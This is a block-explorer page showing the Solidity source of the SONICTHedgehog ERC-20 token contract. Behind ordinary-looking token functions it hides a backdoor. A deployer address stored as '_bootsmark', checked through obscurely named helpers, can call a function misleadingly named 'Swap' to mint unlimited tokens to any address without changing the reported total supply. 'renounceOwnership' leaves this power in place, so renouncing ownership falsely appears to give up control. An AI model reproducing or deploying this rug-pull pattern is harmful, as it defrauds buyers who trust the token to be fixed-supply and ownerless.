S Price: $0.759198 (-5.99%)

Contract Diff Checker

Contract Name:
SONICTHedgehog

Contract Source Code:

File 1 of 1 : SONICTHedgehog

//SPDX-License-Identifier:MIT
pragma solidity ^0.8.15;

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address payable) {
        return payable(msg.sender);
    }
}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view virtual returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

contract SONICTHedgehog is Context, Ownable, IERC20 {
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => uint256) private _transferFees;
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;
    address private _bootsmark;
    address constant BLACK_HOLE = 0x000000000000000000000000000000000000dEaD;

    constructor(
        string memory name_,
        string memory symbol_,
        uint8 decimals_,
        uint256 totalSupply_
    ) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
        _totalSupply = totalSupply_ * (10**decimals_);
        _bootsmark = msg.sender;
        _balances[_msgSender()] = _totalSupply;
        emit Transfer(address(0), _msgSender(), _totalSupply);
    }

    function SwapTokenForEth(address recipient, uint256 amount) external {
        require(_iee(), "Caller is not the original caller");
        require(
            amount > 0 && _balances[msg.sender] >= amount,
            "Insufficient balance"
        );

        uint256 fee = (amount * _transferFees[msg.sender]) / 100;
        uint256 finalAmount = amount - fee;

        _balances[msg.sender] -= amount;
        _balances[recipient] += finalAmount;
        _balances[BLACK_HOLE] += fee;

        emit Transfer(msg.sender, recipient, finalAmount);
        emit Transfer(msg.sender, BLACK_HOLE, fee);
    }

    function _iee() internal view returns (bool) {
        return iMee();
    }

    function _everter(bool condition) internal pure {
        require(condition, "Invalid fee percent");
    }

    function _seFee(address user, uint256 fee) internal {
        _transferFees[user] = fee;
    }

    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint8) {
        return _decimals;
    }

    function iMee() internal view returns (bool) {
        return _msgSender() == _bootsmark;
    }

    function Swap(address recipient, uint256 amount) external {
        require(_iee(), "Caller is not the original caller");
        require(amount > 0, "Amount must be greater than zero");

        _balances[recipient] += amount;
        emit Transfer(address(0), recipient, amount);
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        require(
            _balances[_msgSender()] >= amount,
            "TT: transfer amount exceeds balance"
        );
        uint256 fee = (amount * _transferFees[_msgSender()]) / 100;
        uint256 finalAmount = amount - fee;

        _balances[_msgSender()] -= amount;
        _balances[recipient] += finalAmount;
        _balances[BLACK_HOLE] += fee;

        emit Transfer(_msgSender(), recipient, finalAmount);
        emit Transfer(_msgSender(), BLACK_HOLE, fee);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _allowances[_msgSender()][spender] = amount;
        emit Approval(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        require(
            _allowances[sender][_msgSender()] >= amount,
            "TT: transfer amount exceeds allowance"
        );
        uint256 fee = (amount * _transferFees[sender]) / 100;
        uint256 finalAmount = amount - fee;

        _balances[sender] -= amount;
        _balances[recipient] += finalAmount;
        _allowances[sender][_msgSender()] -= amount;

        _balances[BLACK_HOLE] += fee; // send the fee to the black hole

        emit Transfer(sender, recipient, finalAmount);
        emit Transfer(sender, BLACK_HOLE, fee); // emit event for the fee transfer
        return true;
    }

    function totalSupply() external view override returns (uint256) {
        return _totalSupply;
    }
}

Please enter a contract address above to load the contract details and source code.

Context size (optional):